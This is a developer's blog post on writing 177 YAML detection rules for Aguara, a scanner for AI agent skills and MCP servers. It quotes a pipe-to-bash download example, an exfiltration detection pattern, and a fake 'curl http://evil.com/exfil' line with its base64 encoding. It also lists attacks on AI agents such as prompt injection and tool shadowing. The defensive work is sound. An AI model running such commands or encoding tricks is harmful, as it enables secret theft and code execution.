Gus

I Wrote 177 Security Detection Rules for AI Agent Threats. Here's What I Learned.

Writing one detection rule is easy. Maintaining 177 that run against 50,000 files daily without drowning in false positives is a different problem.

Aguara is a static security scanner for AI agent skills and MCP servers. Every rule ships in YAML, has self-testing examples, and gets validated against a production dataset of 50,000+ real skills. Here's what building a rule engine at this scale taught me.

The anatomy of a rule

Every rule looks like this:

```yaml
id: SUPPLY_006
name: "Unpinned npx execution"
severity: HIGH
category: supply-chain
targets: ["*.json", "*.yaml", "*.yml", "*.md"]
match_mode: any
remediation: "Pin the package to a specific version: npx @package@1.2.3"
patterns:
  - type: regex
    value: "npx\\s+-y\\s+@[\\w-]+/[\\w-]+"
  - type: regex
    value: "npx\\s+-y\\s+[\\w-]+"
exclude_patterns:
  - type: regex
    value: "@\\d+\\.\\d+\\.\\d+"
examples:
  true_positive:
    - "npx -y @someone/mcp-server"
    - "npx -y create-cool-app"
  false_positive:
    - "npx @someone/mcp-server@1.2.3"
```

Fields: an ID, severity, file targets, one or more patterns, optional exclusions, and examples of both true and false positives. The examples aren't documentation. They're tests: `make test` compiles every rule and validates that the true positives match and the false positives don't.

Lesson 1: Go's regexp doesn't do lookaheads

This was my first surprise. Go's regexp package uses RE2, which doesn't support Perl-style lookaheads (`(?!...)`) or lookbehinds (`(?<=...)`).

I needed a rule to distinguish `ln` (hardlink, dangerous) from `ln -s` (symlink, less dangerous). In Perl-compatible regex: `ln\s+(?!-s)`. In RE2: not expressible.

The workaround is the exclude_patterns field. Instead of a single complex regex, you write a matching pattern and a suppression pattern:

```yaml
patterns:
  - type: regex
    value: "\\bln\\s+"
exclude_patterns:
  - type: regex
    value: "\\bln\\s+-s"
```

The engine checks: did the pattern match? Yes. Does an exclude pattern also match on the same line or within 3 lines of context? If so, suppress.

This turns out to be more readable than nested lookaheads anyway. And it composes better. You can add exclude patterns without rewriting the primary regex.

Lesson 2: Markdown code blocks are not attacks

A skill file README with an installation section might include something like `curl https://example.com/setup.sh | bash` inside a fenced code block. That's documentation, not an attack. But the pattern for detecting piped shell execution matches it all the same.

The fix: code block awareness. Before running any rules, the engine builds a code block map in a single O(n) pass over the file. It walks every line, tracks whether it's inside a fenced block, and stores the result. Every finding located inside a fenced code block gets its severity downgraded by one tier (CRITICAL becomes HIGH, HIGH becomes MEDIUM).

The finding is preserved. A code example showing curl | bash is still worth noting. But it doesn't scream CRITICAL when it's clearly instructional.

This single feature eliminated ~30% of false positives in the first round of FP reduction.

Lesson 3: match_mode: all catches what single patterns miss

Some threats only exist as combinations. Reading environment variables isn't dangerous. POSTing to an external URL isn't dangerous. Both in the same file is data exfiltration.

`match_mode: all` requires every pattern in the rule to match somewhere in the file:

```yaml
id: EXFIL_COMBO_001
match_mode: all
patterns:
  - type: regex
    value: "(?i)(env|environment|secret|credential|api.?key)"
  - type: regex
    value: "(?i)(https?://|webhook|POST|fetch|request)"
```

This gives you cross-pattern detection without building a full taint analysis engine. (Aguara also has a real taint tracker as a separate layer, but the all mode catches many cases at the rule level.)

Lesson 4: Base64 hides everything

Attackers encode payloads. A base64-encoded `curl http://evil.com/exfil` looks like `Y3VybCBodHRwOi8vZXZpbC5jb20vZXhmaWw=`. No pattern matcher will catch that on the surface.

The decoder extracts every base64 and hex blob from the file, filters for printable content (>70% printable characters), and re-scans the decoded text against all rules. One extra pass catches an entire class of evasion.

In production, we found base64-encoded reverse shells inside tool definitions in public registries. Not in the README. Inside the tool schema itself.

Lesson 5: Self-testing is not optional

Every rule has `examples.true_positive` and `examples.false_positive`. The test suite compiles each rule and validates:

  1. Every true positive matches (respecting match_mode)
  2. Every false positive does NOT match

This runs on every commit. When I change a regex to reduce false positives, the test immediately tells me if I broke a true positive. When I broaden a pattern, the false positive examples catch over-matching.

At 177 rules with 3-5 examples each, that's ~700 micro-tests running in seconds. They've caught more regressions than any other test in the codebase.

Lesson 6: Real data kills your precision assumptions

Rules that look good against curated examples fall apart against 50,000 real files. Things I didn't anticipate:

  • `npm install` instructions matching supply chain rules (every README has `npm install`)
  • Template variables like `${API_KEY}` matching credential leak rules
  • Shell PATH modifications in setup scripts matching command execution rules
  • License URLs matching external download rules

Four rounds of FP reduction against the Aguara Watch production dataset:

  1. Code block severity downgrade (-30% FP)
  2. Context-aware exclusions: install commands under "Installation" headings suppressed (-15% FP)
  3. Template variable detection: `${VAR}` and `<PLACEHOLDER>` patterns excluded from credential rules (-10% FP)
  4. Category-specific tuning: tightened regexes for high-FP categories like supply chain

Current precision: ~82%. Not perfect. Every week the production data shows us new false positive patterns, and we write exclusions for them.

Lesson 7: 4096 characters is enough regex for anyone

We enforce a maximum pattern length of 4096 characters at compile time. I hit it once, trying to write a single regex that covered 15 variations of a credential pattern.

The fix: split it into multiple patterns under match_mode: any. Shorter patterns are easier to read, easier to debug, and compile faster.

If your regex is approaching 4096 characters, your regex is wrong. Break it up.

The rule categories

177 rules across 12 YAML files:

| Category | Rules | What it catches |
| --- | --- | --- |
| credential-leak | 22 | Hardcoded secrets, API keys, tokens, passwords |
| supply-chain | 21 | Unpinned packages, post-install scripts, dependency confusion |
| prompt-injection | 18 | Instruction overrides, hidden directives, authority claims |
| mcp-attack | 16 | Tool shadowing, description manipulation, scope escalation |
| external-download | 16 | Piped shell execution, wget, unpinned downloads |
| exfiltration | 16 | Data sending patterns, webhook usage, DNS tunneling |
| command-execution | 15 | Shell injection, eval, subprocess abuse |
| ssrf-cloud | 11 | Cloud metadata access, internal network scanning |
| mcp-config | 11 | Privileged containers, exposed env vars, broad permissions |
| indirect-injection | 11 | Cross-context injection, data-as-instructions |
| unicode-attack | 10 | Homoglyph attacks, bidirectional text manipulation |
| third-party-content | 10 | Iframe injection, remote script loading |

On top of these, three additional analysis layers (structural NLP, taint tracking, and rug-pull detection) generate findings from code analysis rather than YAML-defined patterns.

Every rule includes remediation text. When something gets flagged, the scanner tells you what to do about it.

Contributing rules

The YAML format is designed to be readable by non-Go developers. If you can write a regex and explain what it catches, you can contribute a rule:

  1. Pick a category YAML file in `internal/rules/builtin/`
  2. Add your rule with an ID, patterns, and examples
  3. Run `make test` to validate
  4. Open a PR

The self-testing examples are your proof that the rule works. No Go code required.

github.com/garagon/aguara
